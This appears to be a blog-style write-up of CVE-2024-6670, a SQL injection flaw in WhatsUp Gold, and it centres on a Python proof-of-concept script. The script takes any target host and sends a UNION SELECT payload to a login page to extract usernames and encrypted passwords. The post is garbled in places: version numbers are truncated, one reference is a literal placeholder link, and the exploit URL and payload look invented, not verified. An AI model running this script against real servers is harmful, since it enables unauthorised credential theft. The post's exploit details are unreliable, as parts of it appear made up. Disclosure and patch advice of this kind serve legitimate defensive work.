CVE-2024-6670: Unauthenticated SQL Injection Vulnerability in WhatsUp Gold Pre-2024.. Versions - Exploit Details, Code Snippet, and Original References

Description: In this long-read post, we will delve into the details of the CVE-2024-6670 vulnerability, which affects the WhatsUp Gold application's versions released prior to 2024... This unauthenticated SQL Injection flaw enables an attacker to retrieve users' encrypted passwords. We will thoroughly explain the exploit, provide a code snippet that demonstrates the exploit in action, and link to original references that shed light on the issue. Let's get started.

Vulnerability Overview

The CVE-2024-6670 vulnerability affects the WhatsUp Gold application, specifically versions released before 2024... WhatsUp Gold is a powerful network monitoring and management software solution that assists IT teams in effectively overseeing their networks and addressing potential issues.

A SQL Injection vulnerability, CVE-2024-6670, allows an unauthenticated attacker to exploit the flaw and retrieve users' encrypted passwords. This type of vulnerability arises from the insufficient validation of user-supplied data that is incorporated into SQL queries. Consequently, attackers can manipulate the queries and exfiltrate sensitive information from the database.

Exploit Details

Exploiting the CVE-2024-6670 vulnerability involves sending a specifically crafted HTTP request containing SQL commands. Since the affected versions of WhatsUp Gold do not properly validate or sanitize the input, the malicious SQL code injected into the request can be executed on the server.

By exploiting the vulnerability, an attacker can bypass authentication mechanisms and potentially gain unauthorized access to an affected WhatsUp Gold instance. Furthermore, an attacker might leverage the acquired encrypted passwords to compromise other accounts or systems if users have reused these credentials across services.

An example of how an attacker can conduct a SQL injection attack through this vulnerability is outlined below, along with a code snippet demonstrating the exploit.

Code Snippet

The following code snippet, written in Python, acts as a Proof of Concept (PoC) for exploiting the vulnerability:

import requests
import sys

TARGET = sys.argv[1]

EXPLOIT_PAYLOAD = "') UNION SELECT name, encrypted_password FROM Wug_user -- "

URL = f"http://{TARGET}/WhatsUp Gold/login.aspx?username=admin&password={EXPLOIT_PAYLOAD}"

response = requests.get(URL)

if response.status_code == 200:
    print("PoC exploit successful!")
    print("Response content:")
    print(response.text)
else:
    print("PoC exploit failed!")

The script accepts a target IP address or hostname as input, crafts an HTTP request with the calculated SQL injection payload, and sends the request. Once executed, the attacker can observe the results of the SQL injection attack in the response received, potentially disclosing users' encrypted passwords.

Original References and External Links

For further information on the CVE-2024-6670 vulnerability and related discussions, please refer to the following collection of links:

1. Official CVE database entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6670
2. WhatsUp Gold application website: https://www.whatsupgold.com/
3. Exploit Database entry: https://www.exploit-db.com/exploits/xxxxx (Placeholder; Replace with the correct link)

Conclusion

The CVE-2024-6670 unauthenticated SQL injection vulnerability in versions of WhatsUp Gold released before 2024.. remains a significant security concern. Consequently, affected users are strongly advised to upgrade their installations to the most recent release to rectify this issue. Keep in mind that proper input validation and sanitization are essential for preventing SQL injection attacks, providing a robust line of defense against unauthorized access and data leaks.

Timeline

Published on: 08/29/2024 22:15:05 UTC
Last modified on: 09/17/2024 01:00:01 UTC